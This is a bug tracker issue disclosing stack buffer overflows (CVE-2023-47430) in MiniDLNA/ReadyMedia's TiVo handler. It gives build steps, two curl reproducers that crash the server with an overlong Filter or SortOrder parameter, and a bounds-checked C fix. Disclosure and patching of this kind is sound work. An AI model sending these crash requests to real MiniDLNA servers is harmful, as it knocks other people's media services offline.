
#361 stack-buffer-overflows in SendContainer() at tivo_commands.c

Milestone: v1.0 (example)
Status: open
Owner: nobody
Labels: None
Priority: 5
Updated: 2025-07-07
Created: 2024-03-02
Creator: veltavid
Private: No

In MiniDLNA/ReadyMedia v1.3.3, there exist stack-buffer-overflow vulnerabilities due to a lack of proper boundary checks when invoking strcat() on certain variables (i.e., order, order2 and myfilter) in SendContainer(), tivo_commands.c. This allows an attacker to cause a Denial of Service (DoS).

Test Environment

Ubuntu 20.04, 64 bit
MiniDLNA/ReadyMedia (master; commit 1a9b32)

How to trigger

  • Compile the program with the commands below

./configure --enable-tivo CFLAGS="-g -O0 -fstack-protector"
make minidlnad

  • Set enable_tivo to yes and run the program

sed -i "s/enable_tivo=no/enable_tivo=yes/g" minidlna.conf
sudo ./minidlnad -R -f ./minidlna.conf -d

  • Run a command like

curl "http://127.0.0.1:8200/TiVoConnect?Command=QueryContainer&Container=aaaa&Filter=video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video"

or

curl "http://127.0.0.1:8200/TiVoConnect?Command=QueryContainer&Container=aaaa&SortOrder=Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type"
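As an added example (not MiniDLNA's own code), a bounds-checked replacement for the unchecked strcat() pattern described above: a small builder that turns a Filter= list into a clause string and rejects any request whose clause would not fit in its fixed-size buffer. The buffer size, the token-to-clause mapping and the names append_bounded, build_filter and filter_clause are assumptions for illustration.

```c
#include <string.h>

/* Stand-in for the fixed-size stack buffer that SendContainer() fills with
 * strcat(); the size is an assumption, not taken from tivo_commands.c. */
#define FILTER_BUF_SIZE 256

/* Bounded replacement for strcat(): appends src only if it fits together
 * with the NUL terminator; otherwise returns -1 and leaves dst unchanged. */
static int append_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t used = strlen(dst), need = strlen(src);
    if (need >= dst_size - used)
        return -1;
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* Turns a comma-separated Filter= value ("video,music") into a clause
 * string, one term per known token (unknown tokens are ignored).
 * Returns 0 on success, -1 when the result would not fit in out. */
int build_filter(const char *p, char *out, size_t out_size)
{
    out[0] = '\0';
    while (*p) {
        const char *end = strchr(p, ',');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        const char *clause = NULL;
        if (len == 5 && strncmp(p, "video", 5) == 0)
            clause = "MIME glob 'video/*'";
        else if (len == 5 && strncmp(p, "music", 5) == 0)
            clause = "MIME glob 'audio/*'";
        if (clause && ((out[0] && append_bounded(out, out_size, " or ") < 0) ||
                       append_bounded(out, out_size, clause) < 0))
            return -1;                  /* reject instead of overflowing */
        p = end ? end + 1 : p + len;    /* next token, or the final NUL */
    }
    return 0;
}

/* Same over a buffer of the assumed size; NULL means the request was rejected. */
const char *filter_clause(const char *filter)
{
    static char buf[FILTER_BUF_SIZE];
    return build_filter(filter, buf, sizeof buf) == 0 ? buf : NULL;
}

/* Filter value from the first reproducer on this page (19 x "video"). */
const char page_filter[] =
    "video,video,video,video,video,video,video,video,video,video,"
    "video,video,video,video,video,video,video,video,video";
```

With a 256-byte buffer the page's 19-token reproducer is rejected after the eleventh clause, where strcat() would instead have kept writing past the buffer.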

Discussion

  • Dominik Mierzejewski

    FYI, this was assigned CVE-2023-47430.

  • Dominik Mierzejewski

    Attaching a quick and dirty patch to fix. It doesn't crash with the two sample reproducers above anymore.